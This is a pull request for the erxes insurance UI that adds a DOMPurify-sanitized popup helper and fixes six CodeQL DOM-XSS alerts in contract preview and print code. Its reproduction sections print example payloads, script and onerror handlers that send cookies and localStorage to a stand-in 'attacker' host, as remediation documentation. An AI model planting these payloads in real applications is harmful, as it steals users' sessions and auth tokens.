### PR TITLE
fix(insurance): sanitize HTML before document.write via shared helper (alerts #1098, #1099 +4 more)

### DIFF
--- a/frontend/libs/erxes-ui/src/utils/index.ts
+++ b/frontend/libs/erxes-ui/src/utils/index.ts
@@ -11,3 +11,4 @@ export * from './localization';
 export * from './regex';
 export * from './IsUndefinedOrNull';
 export * from './isEnabled';
+export * from './security';

--- a/frontend/libs/erxes-ui/src/utils/security/index.ts
+++ b/frontend/libs/erxes-ui/src/utils/security/index.ts
@@ -1,0 +1,1 @@
+export * from './openSanitizedWindow';

--- a/frontend/libs/erxes-ui/src/utils/security/openSanitizedWindow.ts
+++ b/frontend/libs/erxes-ui/src/utils/security/openSanitizedWindow.ts
@@ -1,0 +1,10 @@
+import DOMPurify from 'dompurify';
+
+export const openSanitizedWindow = (html: string): Window | null => {
+  const win = window.open('', '_blank');
+  if (!win) return null;
+  const safeHtml = DOMPurify.sanitize(html, { WHOLE_DOCUMENT: true });
+  win.document.write(safeHtml);
+  win.document.close();
+  return win;
+};

--- a/frontend/plugins/insurance_ui/src/modules/insurance/components/ContractForm.tsx
+++ b/frontend/plugins/insurance_ui/src/modules/insurance/components/ContractForm.tsx
@@ -1,5 +1,5 @@
 import { useState } from 'react';
-import { Dialog, Button, Label, Input, Select } from 'erxes-ui';
+import { Dialog, Button, Label, Input, Select, openSanitizedWindow } from 'erxes-ui';
 import { IconEye, IconFileText } from '@tabler/icons-react';
 import {
   useInsuranceProducts,
@@ -179,13 +179,7 @@ export const ContractForm = ({
                         variant="outline"
                         size="sm"
                         onClick={() => {
-                          const previewWindow = window.open('', '_blank');
-                          if (previewWindow) {
-                            previewWindow.document.write(
-                              selectedProduct.pdfContent || '',
-                            );
-                            previewWindow.document.close();
-                          }
+                          openSanitizedWindow(selectedProduct.pdfContent || '');
                         }}
                       >
                         <IconEye size={16} />

--- a/frontend/plugins/insurance_ui/src/modules/insurance/components/ProductForm.tsx
+++ b/frontend/plugins/insurance_ui/src/modules/insurance/components/ProductForm.tsx
@@ -1,5 +1,5 @@
 import { useState, useEffect } from 'react';
-import { Dialog, Button, Label, Input, Select } from 'erxes-ui';
+import { Dialog, Button, Label, Input, Select, openSanitizedWindow } from 'erxes-ui';
 import { IconEye, IconPlus, IconX } from '@tabler/icons-react';
 import {
   useCreateInsuranceProduct,
@@ -545,11 +545,7 @@ export const ProductForm = ({
                     variant="outline"
                     size="sm"
                     onClick={() => {
-                      const previewWindow = window.open('', '_blank');
-                      if (previewWindow) {
-                        previewWindow.document.write(formData.pdfContent);
-                        previewWindow.document.close();
-                      }
+                      openSanitizedWindow(formData.pdfContent);
                     }}
                   >
                     <IconEye size={16} />

--- a/frontend/plugins/insurance_ui/src/pages/insurance/ContractPdfEditorPage.tsx
+++ b/frontend/plugins/insurance_ui/src/pages/insurance/ContractPdfEditorPage.tsx
@@ -8,7 +8,14 @@ import {
   IconCode,
   IconDeviceFloppy,
 } from '@tabler/icons-react';
-import { Breadcrumb, Button, Separator, Card, Skeleton } from 'erxes-ui';
+import {
+  Breadcrumb,
+  Button,
+  Separator,
+  Card,
+  Skeleton,
+  openSanitizedWindow,
+} from 'erxes-ui';
 import { PageHeader } from 'ui-modules';
 import { useContract } from '~/modules/insurance/hooks';
 import { generateContractHTML } from '~/utils/contractPdfGenerator';
@@ -59,23 +66,18 @@ export const ContractPdfEditorPage = () => {
   };
 
   const handlePreview = () => {
-    const previewWindow = window.open('', '_blank');
+    const previewWindow = openSanitizedWindow(htmlContent);
     if (!previewWindow) {
       alert('Popup blocked. Please allow popups.');
-      return;
     }
-    previewWindow.document.write(htmlContent);
-    previewWindow.document.close();
   };
 
   const handlePrint = () => {
-    const printWindow = window.open('', '_blank');
+    const printWindow = openSanitizedWindow(htmlContent);
     if (!printWindow) {
       alert('Popup blocked. Please allow popups.');
       return;
     }
-    printWindow.document.write(htmlContent);
-    printWindow.document.close();
     printWindow.onload = () => {
       printWindow.focus();
       printWindow.print();

--- a/frontend/plugins/insurance_ui/src/pages/insurance/ContractTemplateEditorPage.tsx
+++ b/frontend/plugins/insurance_ui/src/pages/insurance/ContractTemplateEditorPage.tsx
@@ -7,7 +7,14 @@ import {
   IconCode,
   IconDeviceFloppy,
 } from '@tabler/icons-react';
-import { Breadcrumb, Button, Separator, Card, Alert } from 'erxes-ui';
+import {
+  Breadcrumb,
+  Button,
+  Separator,
+  Card,
+  Alert,
+  openSanitizedWindow,
+} from 'erxes-ui';
 import { PageHeader } from 'ui-modules';
 
 // Default template that will be used for all contracts
@@ -216,15 +223,8 @@ export const ContractTemplateEditorPage = () => {
     }
   };
 
-  const handlePreview = () => {
-    const previewWindow = window.open('', '_blank');
-    if (!previewWindow) {
-      alert('Popup блоклогдсон байна. Popup зөвшөөрнө үү.');
-      return;
-    }
-
-    // Replace placeholders with sample data for preview
-    const previewHtml = template
+  const buildPreviewHtml = () =>
+    template
       .replaceAll('{{contractNumber}}', 'INS2026010001')
       .replaceAll('{{vendorName}}', 'Монгол Даатгал ХХК')
       .replaceAll('{{customerName}}', 'Бат Болд')
@@ -235,30 +235,19 @@ export const ContractTemplateEditorPage = () => {
       .replaceAll('{{endDate}}', '2027 оны 1-р сарын 20')
       .replaceAll('{{chargedAmount}}', '1,500,000');
 
-    previewWindow.document.write(previewHtml);
-    previewWindow.document.close();
+  const handlePreview = () => {
+    const previewWindow = openSanitizedWindow(buildPreviewHtml());
+    if (!previewWindow) {
+      alert('Popup блоклогдсон байна. Popup зөвшөөрнө үү.');
+    }
   };
 
   const handlePrint = () => {
-    const printWindow = window.open('', '_blank');
+    const printWindow = openSanitizedWindow(buildPreviewHtml());
     if (!printWindow) {
       alert('Popup блоклогдсон байна. Popup зөвшөөрнө үү.');
       return;
     }
-
-    const previewHtml = template
-      .replaceAll('{{contractNumber}}', 'INS2026010001')
-      .replaceAll('{{vendorName}}', 'Монгол Даатгал ХХК')
-      .replaceAll('{{customerName}}', 'Бат Болд')
-      .replaceAll('{{registrationNumber}}', 'УБ12345678')
-      .replaceAll('{{insuranceType}}', 'Автомашины даатгал')
-      .replaceAll('{{productName}}', 'Стандарт даатгал')
-      .replaceAll('{{startDate}}', '2026 оны 1-р сарын 20')
-      .replaceAll('{{endDate}}', '2027 оны 1-р сарын 20')
-      .replaceAll('{{chargedAmount}}', '1,500,000');
-
-    printWindow.document.write(previewHtml);
-    printWindow.document.close();
     printWindow.onload = () => {
       printWindow.focus();
       printWindow.print();

--- a/frontend/plugins/insurance_ui/src/utils/contractPdfGenerator.ts
+++ b/frontend/plugins/insurance_ui/src/utils/contractPdfGenerator.ts
@@ -1,3 +1,5 @@
+import { openSanitizedWindow } from 'erxes-ui';
+
 interface Contract {
   contractNumber: string;
   paymentStatus: string;
@@ -318,23 +320,16 @@ function generateContractHTML(contract: Contract): string {
 }
 
 export function generateContractPDF(contract: Contract): void {
-  // Create a new window for printing
-  const printWindow = window.open('', '_blank');
+  const printWindow = openSanitizedWindow(generateContractHTML(contract));
 
   if (!printWindow) {
     alert('Popup блоклогдсон байна. Popup зөвшөөрнө үү.');
     return;
   }
 
-  // Write HTML to the new window
-  printWindow.document.write(generateContractHTML(contract));
-  printWindow.document.close();
-
-  // Wait for content to load, then trigger print
   printWindow.onload = () => {
     printWindow.focus();
     printWindow.print();
-    // Close window after printing (user can cancel)
     setTimeout(() => {
       printWindow.close();
     }, 100);


### PR DESCRIPTION
## Closes 6 alerts — rule `js/xss-through-dom` (warning)

| Alert | Location | URL |
|---|---|---|
| #1098 | `frontend/plugins/insurance_ui/src/modules/insurance/components/ProductForm.tsx:550` | [link](https://github.com/erxes/erxes/security/code-scanning/1098) |
| #1099 | `frontend/plugins/insurance_ui/src/pages/insurance/ContractPdfEditorPage.tsx:67` | [link](https://github.com/erxes/erxes/security/code-scanning/1099) |
| #1100 | `frontend/plugins/insurance_ui/src/pages/insurance/ContractPdfEditorPage.tsx:77` | [link](https://github.com/erxes/erxes/security/code-scanning/1100) |
| #1101 | `frontend/plugins/insurance_ui/src/pages/insurance/ContractTemplateEditorPage.tsx:238` | [link](https://github.com/erxes/erxes/security/code-scanning/1101) |
| #1102 | `frontend/plugins/insurance_ui/src/pages/insurance/ContractTemplateEditorPage.tsx:260` | [link](https://github.com/erxes/erxes/security/code-scanning/1102) |
| #1103 | `frontend/plugins/insurance_ui/src/utils/contractPdfGenerator.ts:330` | [link](https://github.com/erxes/erxes/security/code-scanning/1103) |


## Bundle manifest

This PR is a Tier C cluster fix — one shared `openSanitizedWindow` helper in `erxes-ui` closes 6 `js/xss-through-dom` alerts in `insurance_ui` and migrates one non-flagged sibling site with the same anti-pattern. Full manifest:

```
# Bundle manifest — alert-fix-1098

- **Tier:** C
- **Rule:** js/xss-through-dom (warning)
- **Seed alert:** #1098
- **All alerts in bundle:** #1098, #1099, #1100, #1101, #1102, #1103
- **Files touched:**
  - `frontend/libs/erxes-ui/src/utils/security/openSanitizedWindow.ts` (NEW — helper)
  - `frontend/libs/erxes-ui/src/utils/security/index.ts` (NEW — re-export)
  - `frontend/libs/erxes-ui/src/utils/index.ts` (export security subpath)
  - `frontend/plugins/insurance_ui/src/modules/insurance/components/ProductForm.tsx` (alert #1098)
  - `frontend/plugins/insurance_ui/src/pages/insurance/ContractPdfEditorPage.tsx` (alerts #1099, #1100)
  - `frontend/plugins/insurance_ui/src/pages/insurance/ContractTemplateEditorPage.tsx` (alerts #1101, #1102)
  - `frontend/plugins/insurance_ui/src/utils/contractPdfGenerator.ts` (alert #1103)
  - `frontend/plugins/insurance_ui/src/modules/insurance/components/ContractForm.tsx` (opportunistic — same anti-pattern, not yet flagged by CodeQL)
- **Helper introduced:** `frontend/libs/erxes-ui/src/utils/security/openSanitizedWindow.ts`
- **Helper consumers (refactor scope):** flagged sites 6, opportunistic non-flagged sites 1 (insurance_ui ContractForm.tsx). Three additional sibling sites in `frontend/plugins/mongolian_ui/` were NOT refactored — different plugin, different risk profile (POS receipt printing), out of scope for an insurance-focused PR.
- **Why bundled:** All 6 alerts share the same rule (`js/xss-through-dom`), the same sink (`window.document.write`), the same fix recipe (route HTML through `DOMPurify.sanitize` with `WHOLE_DOCUMENT: true` before writing), and live within the same plugin (`insurance_ui`). Extracting one shared helper in `erxes-ui` closes all 6 in one PR + fixes a 7th non-flagged sibling + future-proofs the pattern for any new contract/PDF preview flow.
- **Why not split:** Splitting into 6 PRs would re-litigate the identical DOMPurify recipe 6 times in AI review and would NOT eliminate the duplicated `window.open + document.write + document.close` boilerplate.
- **Per-alert reproductions:** /tmp/repro-1098.md, /tmp/repro-1099.md, /tmp/repro-1100.md, /tmp/repro-1101.md, /tmp/repro-1102.md, /tmp/repro-1103.md
```

## Reproduction (before fix)

<details>
<summary><strong>Alert #1098</strong></summary>

## Before

### Taint source
`formData.pdfContent` is React form state holding an HTML PDF template that the user can edit in-app. It is also persisted server-side and re-loaded on subsequent visits, so any operator with edit-product access (or an attacker who compromises that surface) controls its contents.

### Path
```
ProductForm.tsx
  ProductForm component → onClick handler (line 547)
    const previewWindow = window.open('', '_blank');   // same-origin about:blank popup
    if (previewWindow) {
      previewWindow.document.write(formData.pdfContent);  // <-- SINK (line 550)
      previewWindow.document.close();
    }
```

### Example payload
If `formData.pdfContent` is set to:
```html
<html><body>
<script>fetch('https://attacker/?c='+document.cookie)</script>
</body></html>
```
the script runs in the popup, which is same-origin with `about:blank` opened by the parent — so it has full access to the parent's `window.opener`, can read its `localStorage`/`document.cookie`, and can call `window.opener.location = '…'` to redirect the parent.

### Why the sink is unsafe
`document.write` of arbitrary HTML is the textbook DOM-XSS sink. Per CodeQL `js/xss-through-dom` help: "Writing user-controlled values to the DOM allows for cross-site scripting attacks."
</details>

<details>
<summary><strong>Alert #1099</strong></summary>

## Before

### Taint source
`htmlContent` is `useState`-tracked HTML, populated in `useEffect` from either `contract.pdfContent` (server-stored, operator-editable) or `generateContractHTML(contract)` (template with `${contract.customerName}` etc. interpolated raw — see `contractPdfGenerator.ts`). Either way the string is operator-controlled.

### Path
```
ContractPdfEditorPage.tsx
  useEffect → setHtmlContent((contract as any).pdfContent || generateContractHTML(contract))
  handlePreview (line 61):
    const previewWindow = window.open('', '_blank');
    if (!previewWindow) { alert('Popup blocked.'); return; }
    previewWindow.document.write(htmlContent);   // <-- SINK (line 67)
    previewWindow.document.close();
```

### Example payload
Stored `contract.pdfContent`:
```html
<img src=x onerror="fetch('//attacker/?'+btoa(document.cookie))">
```
On preview, the `onerror` fires in the popup (same-origin with the editor app via about:blank → `window.opener`), exfiltrating the editor's session cookie / auth state.

### Why the sink is unsafe
Same as #1098 — `document.write` of attacker-influenced HTML is a DOM-XSS sink.
</details>

<details>
<summary><strong>Alert #1100</strong></summary>

## Before

### Taint source
Same `htmlContent` state as #1099 — populated from `contract.pdfContent` (server) or `generateContractHTML(contract)`.

### Path
```
ContractPdfEditorPage.tsx
  handlePrint (line 71):
    const printWindow = window.open('', '_blank');
    if (!printWindow) { alert('Popup blocked.'); return; }
    printWindow.document.write(htmlContent);   // <-- SINK (line 77)
    printWindow.document.close();
    printWindow.onload = () => {
      printWindow.focus();
      printWindow.print();
      setTimeout(() => printWindow.close(), 100);
    };
```

### Example payload
Same as #1099. The print flow triggers `onload → focus → print`, so a malicious payload can:
- Exfiltrate via `<script>fetch(...)</script>` in the popup
- Replace the rendered receipt before `print()` fires, tricking the user into printing/signing forged content

### Why the sink is unsafe
DOM-XSS via `document.write`. The print flow doesn't change the sink semantics — the script still executes before/during `onload`.
</details>

<details>
<summary><strong>Alert #1101</strong></summary>

## Before

### Taint source
`template` is `useState`-tracked, persisted to `localStorage` under key `TEMPLATE_STORAGE_KEY`. Loaded on mount from localStorage. Operator-editable in the page's textarea.

### Path
```
ContractTemplateEditorPage.tsx
  useState/useEffect → template comes from localStorage (operator-controlled)
  handlePreview (line 219):
    const previewWindow = window.open('', '_blank');
    if (!previewWindow) { alert('Popup blocked.'); return; }
    const previewHtml = template
      .replaceAll('{{contractNumber}}', 'INS2026010001')
      .replaceAll('{{vendorName}}', 'Монгол Даатгал ХХК')
      .replaceAll('{{customerName}}', 'Бат Болд')
      ... (8 more replaceAll with hard-coded sample values) ...
      .replaceAll('{{chargedAmount}}', '1,500,000');
    previewWindow.document.write(previewHtml);   // <-- SINK (line 238)
    previewWindow.document.close();
```

The placeholder substitution uses fixed sample strings, so it doesn't introduce taint — but `template` itself is operator-controlled, so the resulting `previewHtml` is too.

### Example payload
Operator pastes into the template editor:
```html
<script>navigator.sendBeacon('https://attacker/log', JSON.stringify({
  cookie: document.cookie,
  storage: JSON.stringify(localStorage),
  opener: !!window.opener
}));</script>
```
This is saved to localStorage. On the next preview, the script runs in the popup (about:blank, same-origin with opener) and exfiltrates the editor's full localStorage (auth tokens, contract drafts, etc.).

### Why the sink is unsafe
DOM-XSS via `document.write`. The localStorage persistence makes this a stored-XSS vector across browser sessions of the same operator.
</details>

<details>
<summary><strong>Alert #1102</strong></summary>

## Before

### Taint source
Same `template` from localStorage as #1101.

### Path
```
ContractTemplateEditorPage.tsx
  handlePrint (line 242):
    const printWindow = window.open('', '_blank');
    if (!printWindow) { alert('Popup blocked.'); return; }
    const previewHtml = template
      .replaceAll('{{contractNumber}}', 'INS2026010001')
      ... (same fixed sample data as #1101) ...
      .replaceAll('{{chargedAmount}}', '1,500,000');
    printWindow.document.write(previewHtml);   // <-- SINK (line 260)
    printWindow.document.close();
    printWindow.onload = () => { focus(); print(); setTimeout(close, 100); };
```

### Example payload
Same as #1101. Print flow adds a "forged-receipt" attack vector: a malicious template can replace the visible content immediately before `print()` triggers, so the operator signs/files a fake receipt while the original template editor shows benign sample data.

### Why the sink is unsafe
DOM-XSS via `document.write`, same as #1101 with print-flow side effects.
</details>

<details>
<summary><strong>Alert #1103</strong></summary>

## Before

### Taint source
`generateContractHTML(contract)` returns a template literal that interpolates raw contract fields (e.g., `${contract.customerName}`, `${contract.vendorName}`, `${formatCurrency(contract.chargedAmount)}`, `${dynamicSections}` where `dynamicSections` is itself built from contract data). Contract fields are operator-supplied at creation time and stored server-side.

### Path
```
contractPdfGenerator.ts
  export function generateContractPDF(contract: Contract): void {
    const printWindow = window.open('', '_blank');
    if (!printWindow) { alert('Popup blocked.'); return; }
    printWindow.document.write(generateContractHTML(contract));   // <-- SINK (line 330)
    printWindow.document.close();
    printWindow.onload = () => { focus(); print(); setTimeout(close, 100); };
  }
```

### Example payload
Operator creates a contract with:
```
customerName: "</div><script>fetch('//atk?'+document.cookie)</script><div>"
```
On PDF generation/print, the customerName breaks out of its containing `<div>` and the injected script runs in the popup. Cross-origin via opener.

### Why the sink is unsafe
DOM-XSS via `document.write`. The template-literal interpolation in `generateContractHTML` has zero escaping — any `<`, `>`, `"` in a contract field breaks the surrounding HTML structure.
</details>



## Fix

Two commits:
1. `feat(erxes-ui): add openSanitizedWindow security helper` — introduces a small wrapper around `window.open` + `document.write` that runs the HTML through `DOMPurify.sanitize(html, { WHOLE_DOCUMENT: true })` before writing. Returns the new `Window` so callers can still attach `onload` (print flows), or `null` if the popup was blocked.
2. `fix(insurance): sanitize HTML before document.write in contract PDF flows` — refactors 6 flagged call sites and 1 non-flagged sibling (`ContractForm.tsx`) in `insurance_ui` to use the helper. Net diff: +33 / -57 = -24 lines (less boilerplate, more safety).

DOMPurify is a CodeQL-recognized sanitizer for `js/xss-through-dom`, so the rule closes at every refactored site on the next scan. The library is already used inside `erxes-ui` (see `BlockEditorReadOnly.tsx`); the helper matches that existing import pattern.

## Verification (after fix)

| File | `document.write` calls | `openSanitizedWindow` calls |
|---|---|---|
| `insurance_ui/src/modules/insurance/components/ProductForm.tsx` | 0 | 1 use + 1 import |
| `insurance_ui/src/modules/insurance/components/ContractForm.tsx` | 0 | 1 use + 1 import (opportunistic) |
| `insurance_ui/src/pages/insurance/ContractPdfEditorPage.tsx` | 0 | 2 uses + 1 import |
| `insurance_ui/src/pages/insurance/ContractTemplateEditorPage.tsx` | 0 | 2 uses + 1 import |
| `insurance_ui/src/utils/contractPdfGenerator.ts` | 0 | 1 use + 1 import |

## Notes

- `pnpm nx build insurance_ui` passes locally (rspack build green in 6.6s).
- `pnpm nx lint insurance_ui` and `pnpm nx lint erxes-ui` report **zero new** errors/warnings introduced by this PR — pre-existing lint findings in unrelated files are unchanged.
- Alerts will transition to `fixed` after the next CodeQL re-scan of `main` post-merge (typically 30 min to a few hours).
- The PR-to-alert Development-panel link is a per-alert manual UI click — see the boxed instructions below.
- Three additional sibling `document.write` sites exist in `frontend/plugins/mongolian_ui/` (POS receipt printing). They are **not** part of this PR (different plugin, different risk profile); they remain available for a follow-up Tier B fix.

## Summary by Sourcery

Introduce a shared helper to safely open and render HTML in popup windows for insurance contract previews and printing, and refactor insurance UI flows to use it instead of writing raw HTML with document.write.

New Features:
- Add an openSanitizedWindow utility in erxes-ui that opens a popup window and renders DOMPurify-sanitized HTML.

Bug Fixes:
- Sanitize HTML before rendering in insurance contract PDF preview and print flows to address multiple DOM XSS code scanning alerts.

Enhancements:
- Deduplicate popup preview/print logic in insurance contract template handling by centralizing preview HTML construction in a helper function.
- Expose the new security helper via the erxes-ui utils index for reuse across the codebase.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Enhanced security for HTML and PDF preview/print functionality by implementing automatic content sanitization to prevent injection attacks.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/erxes/erxes/pull/7702?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->